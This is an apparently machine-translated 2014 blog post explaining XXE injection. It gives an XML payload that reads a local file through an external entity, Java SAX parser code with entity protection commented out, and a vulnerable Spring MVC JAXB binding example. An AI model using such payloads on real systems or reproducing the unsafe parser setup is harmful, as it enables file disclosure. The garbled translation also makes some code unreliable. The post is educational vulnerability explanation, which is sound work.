The Nebula, 2014/05/08 silla
0 x00 background
What is XXE? This is what we call XML entity injection. Instead of covering all the XML syntax specifications, let’s take a look at XML Entity:
It is an entity. It acts like a "macro" in Word, or a template in DW. You can define an entity up front and call it multiple times in one document, or call the same entity in multiple documents. (XML defines two types of entity. One is what we call a plain entity, which is used in XML documents; The other is the argument Entity, used in DTD files.) .Copy the codeEntity definition syntax is:
#! xml <! DOCTYPE filename [ <!ENTITY entity-name "entity-content" ]>Copy the codeTo reference an external resource:
#! xml <! DOCTYPE test [ <!ENTITY test SYSTEM "http://xxx.xxx.com/test.xml"> ]>Copy the codeENTITY can use the SYSTEM keyword to call external resources, and there are many protocols supported, such as HTTP; The file etc.
It can then be used in other DoM nodes such as &test; Reference the entity content.
Therefore, if the XML parsed in the product function design is externally controlled, it may develop vulnerabilities such as file reading,DoS,CSRF, etc.
Here only introduces the file read vulnerability, the other can be their own Google understand.
0 x01 principle
The specification is fine, and some XML parsers are fine, but the people who use them are.
Java SAX parser Demo:
Test.java
#! java public static void main(String[] args) throws Exception { SAXReader reader = new SAXReader(); / / prohibited / / reader. The setFeature (" http://xml.org/sax/features/external-general-entities ", true); Document dom = reader.read("E:/1.xml"); Element root = dom.getRootElement(); Iterator<Element> it = root.elementIterator(); while (it.hasNext()) { Element elements = it.next(); System.out.println(elements.getText()); }}Copy the codeParsing of XML, XML:
#! xml <? The XML version = "1.0" encoding = "utf-8"? > <! DOCTYPE test [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "file:///E:/1.log" >]> <root> <name>& xxe; </name> </root>Copy the codeResource called by entity, 1.log:
XXE test!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Copy the codeFirst of all, parsers generally support all XML specifications. Using the File protocol, we can theoretically read at least any file content on the current system. For example, read the contents of the 1.log file in drive E.
It is then referenced by root’s child node, the name content field. Analytical results, as shown in the figure:
Next, spring MVC in XML format to Java object deserialization, there may be XXE formed file read:
Spring provides the ability to bind XML request content to a POJO (also known as a Javabean), form binding, and JSON binding.
spring mvc JAXB xml to pojo unMarshaller demo:
Spring – servlet. XML:
#! xml <? The XML version = "1.0" encoding = "utf-8"? > <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p" xmlns:context="http://www.springframework.org/schema/context" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd "> < context: component - scan base-package="net.spring.controller" /> <bean class="org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter"> <property name="messageConverters"> <list> <ref bean="stringHttpMessageConverter" /> <ref bean="jsonHttpMessageConverter" /> <ref bean="marshallingHttpMessageConverter" /> </list> </property> </bean> <bean id="stringHttpMessageConverter" class="org.springframework.http.converter.StringHttpMessageConverter" /> <bean id="jsonHttpMessageConverter" class="org.springframework.http.converter.json.MappingJacksonHttpMessageConverter" /> <bean id="marshallingHttpMessageConverter" class="org.springframework.http.converter.xml.MarshallingHttpMessageConverter"> <constructor-arg ref="jaxbMarshaller" /> <property name="supportedMediaTypes" value="application/xml"></property> </bean> <bean id="jaxbMarshaller" class="org.springframework.oxm.jaxb.Jaxb2Marshaller"> <property name="classesToBeBound"> <list> <value>net.spring.controller.User</value> </list> </property> </bean> </beans>Copy the codeHelloWorldController. Java:
#!java
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.servlet.ModelAndView;
@Controller
public class HelloWorldController {
@RequestMapping("/hello")
public ModelAndView helloWorld(@RequestBody User user) {
System.out.println("xxxxxxxxxx"+user.getName());
return new ModelAndView("hello", "user", user);
}
}
Copy the codeUser.java (XML-bound POJOs) :
#!java
import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;
@XmlRootElement(name="user")
public class User {
private String name;
public String getName() {
return name;
}
@XmlElement
public void setName(String name) {
this.name = name;
}
}
Copy the codeSend package, XML binding POJO, as shown in the figure:
The name attribute of the POJO User object is contaminated, as shown in the following figure:
If the attacker can finally see the name value (displayed directly to the page or stored in the database to reproduce the actual page), it is a file read vulnerability!
That’s how it works, whether it’s in other languages or scenarios.
Spring has been patched, here is mainly a vulnerability scenario, now basically no harm? Since this feature is not used very often, it will certainly be used by the early framework users, which may take a decade or so:
https://jira.spring.io/browse/SPR-10806
Of course, there is a small but interesting problem, which may be covered in a later article.